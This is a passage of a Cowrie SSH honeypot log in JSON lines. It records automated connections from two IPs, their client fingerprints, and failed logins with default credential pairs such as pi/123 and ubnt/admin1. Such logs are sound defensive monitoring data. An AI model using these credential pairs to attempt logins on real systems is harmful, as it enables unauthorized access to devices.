98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:47.206323Z","src_ip":"212.227.125.160","session":"5e8f9ed02225"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"admin1","message":"login attempt [ubnt/admin1] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:47.540117Z","src_ip":"212.227.125.160","session":"5e8f9ed02225"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:47.997757Z","src_ip":"212.227.125.160","session":"d82ba0c1a2f6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35046,"dst_ip":"1.2.3.4","dst_port":22,"session":"f67735aec68d","protocol":"ssh","message":"New connection: 212.227.125.160:35046 (1.2.3.4:22) [session: f67735aec68d]","sensor":"my-vps","timestamp":"2025-08-26T11:33:48.053842Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:48.102310Z","src_ip":"212.227.125.160","session":"f67735aec68d"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:48.103099Z","src_ip":"212.227.125.160","session":"f67735aec68d"}
{"eventid":"cowrie.login.failed","username":"pi","password":"admin1","message":"login attempt [pi/admin1] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:48.455708Z","src_ip":"212.227.125.160","session":"f67735aec68d"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:48.626172Z","src_ip":"212.227.125.160","session":"5e8f9ed02225"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35066,"dst_ip":"1.2.3.4","dst_port":22,"session":"d819efaf98de","protocol":"ssh","message":"New connection: 212.227.125.160:35066 (1.2.3.4:22) [session: d819efaf98de]","sensor":"my-vps","timestamp":"2025-08-26T11:33:48.676888Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:48.711181Z","src_ip":"212.227.125.160","session":"d819efaf98de"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:48.754442Z","src_ip":"212.227.125.160","session":"d819efaf98de"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"123","message":"login attempt [ubnt/123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:48.988800Z","src_ip":"212.227.125.160","session":"d819efaf98de"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:49.541358Z","src_ip":"212.227.125.160","session":"f67735aec68d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35116,"dst_ip":"1.2.3.4","dst_port":22,"session":"57326b2b56e4","protocol":"ssh","message":"New connection: 212.227.125.160:35116 (1.2.3.4:22) [session: 57326b2b56e4]","sensor":"my-vps","timestamp":"2025-08-26T11:33:49.592763Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:49.614878Z","src_ip":"212.227.125.160","session":"57326b2b56e4"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:49.661278Z","src_ip":"212.227.125.160","session":"57326b2b56e4"}
{"eventid":"cowrie.login.failed","username":"pi","password":"123","message":"login attempt [pi/123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:49.919093Z","src_ip":"212.227.125.160","session":"57326b2b56e4"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:50.065526Z","src_ip":"212.227.125.160","session":"d819efaf98de"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35168,"dst_ip":"1.2.3.4","dst_port":22,"session":"baeb19561c9f","protocol":"ssh","message":"New connection: 212.227.125.160:35168 (1.2.3.4:22) [session: baeb19561c9f]","sensor":"my-vps","timestamp":"2025-08-26T11:33:50.145597Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:50.197158Z","src_ip":"212.227.125.160","session":"baeb19561c9f"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:50.198205Z","src_ip":"212.227.125.160","session":"baeb19561c9f"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"Asdf1234","message":"login attempt [ubnt/Asdf1234] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:50.599707Z","src_ip":"212.227.125.160","session":"baeb19561c9f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59886,"dst_ip":"1.2.3.4","dst_port":22,"session":"e9884048588a","protocol":"ssh","message":"New connection: 212.227.125.160:59886 (1.2.3.4:22) [session: e9884048588a]","sensor":"my-vps","timestamp":"2025-08-26T11:33:50.852042Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:50.853892Z","src_ip":"212.227.125.160","session":"e9884048588a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:33:50.904318Z","src_ip":"212.227.125.160","session":"e9884048588a"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:51.045995Z","src_ip":"212.227.125.160","session":"57326b2b56e4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35260,"dst_ip":"1.2.3.4","dst_port":22,"session":"69db4a6636e2","protocol":"ssh","message":"New connection: 212.227.125.160:35260 (1.2.3.4:22) [session: 69db4a6636e2]","sensor":"my-vps","timestamp":"2025-08-26T11:33:51.097293Z"}
{"eventid":"cowrie.login.failed","username":"runner","password":"runner","message":"login attempt [runner/runner] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:51.121319Z","src_ip":"212.227.125.160","session":"e9884048588a"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:51.166378Z","src_ip":"212.227.125.160","session":"69db4a6636e2"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:51.167901Z","src_ip":"212.227.125.160","session":"69db4a6636e2"}
{"eventid":"cowrie.login.failed","username":"pi","password":"Asdf1234","message":"login attempt [pi/Asdf1234] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:51.676779Z","src_ip":"212.227.125.160","session":"69db4a6636e2"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:51.723335Z","src_ip":"212.227.125.160","session":"baeb19561c9f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35332,"dst_ip":"1.2.3.4","dst_port":22,"session":"3ded59585406","protocol":"ssh","message":"New connection: 212.227.125.160:35332 (1.2.3.4:22) [session: 3ded59585406]","sensor":"my-vps","timestamp":"2025-08-26T11:33:51.778608Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:51.868069Z","src_ip":"212.227.125.160","session":"3ded59585406"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:51.868770Z","src_ip":"212.227.125.160","session":"3ded59585406"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:52.174236Z","src_ip":"212.227.125.160","session":"e9884048588a"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:52.909378Z","src_ip":"212.227.125.160","session":"69db4a6636e2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35420,"dst_ip":"1.2.3.4","dst_port":22,"session":"d76ca1c61e04","protocol":"ssh","message":"New connection: 212.227.125.160:35420 (1.2.3.4:22) [session: d76ca1c61e04]","sensor":"my-vps","timestamp":"2025-08-26T11:33:52.995761Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:53.245065Z","src_ip":"212.227.125.160","session":"d76ca1c61e04"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:53.245873Z","src_ip":"212.227.125.160","session":"d76ca1c61e04"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":53008,"dst_ip":"1.2.3.4","dst_port":22,"session":"67eb41acf8e9","protocol":"ssh","message":"New connection: 83.168.105.65:53008 (1.2.3.4:22) [session: 67eb41acf8e9]","sensor":"my-vps","timestamp":"2025-08-26T11:33:54.341160Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:54.341960Z","src_ip":"83.168.105.65","session":"67eb41acf8e9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:33:54.378294Z","src_ip":"83.168.105.65","session":"67eb41acf8e9"}
{"eventid":"cowrie.login.failed","username":"pi","password":"1","message":"login attempt [pi/1] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:54.413254Z","src_ip":"212.227.125.160","session":"d76ca1c61e04"}
{"eventid":"cowrie.login.failed","username":"tools","password":"tools","message":"login attempt [tools/tools] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:54.488544Z","src_ip":"83.168.105.65","session":"67eb41acf8e9"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:55.457901Z","src_ip":"212.227.125.160","session":"d76ca1c61e04"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48960,"dst_ip":"1.2.3.4","dst_port":22,"session":"d9a24380d80b","protocol":"ssh","message":"New connection: 212.227.125.160:48960 (1.2.3.4:22) [session: d9a24380d80b]","sensor":"my-vps","timestamp":"2025-08-26T11:33:55.500136Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:55.500891Z","src_ip":"212.227.125.160","session":"d9a24380d80b"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:55.526430Z","src_ip":"83.168.105.65","session":"67eb41acf8e9"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:55.542998Z","src_ip":"212.227.125.160","session":"d9a24380d80b"}
{"eventid":"cowrie.login.failed","username":"pi","password":"1qaz2wsx","message":"login attempt [pi/1qaz2wsx] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:55.683666Z","src_ip":"212.227.125.160","session":"d9a24380d80b"}
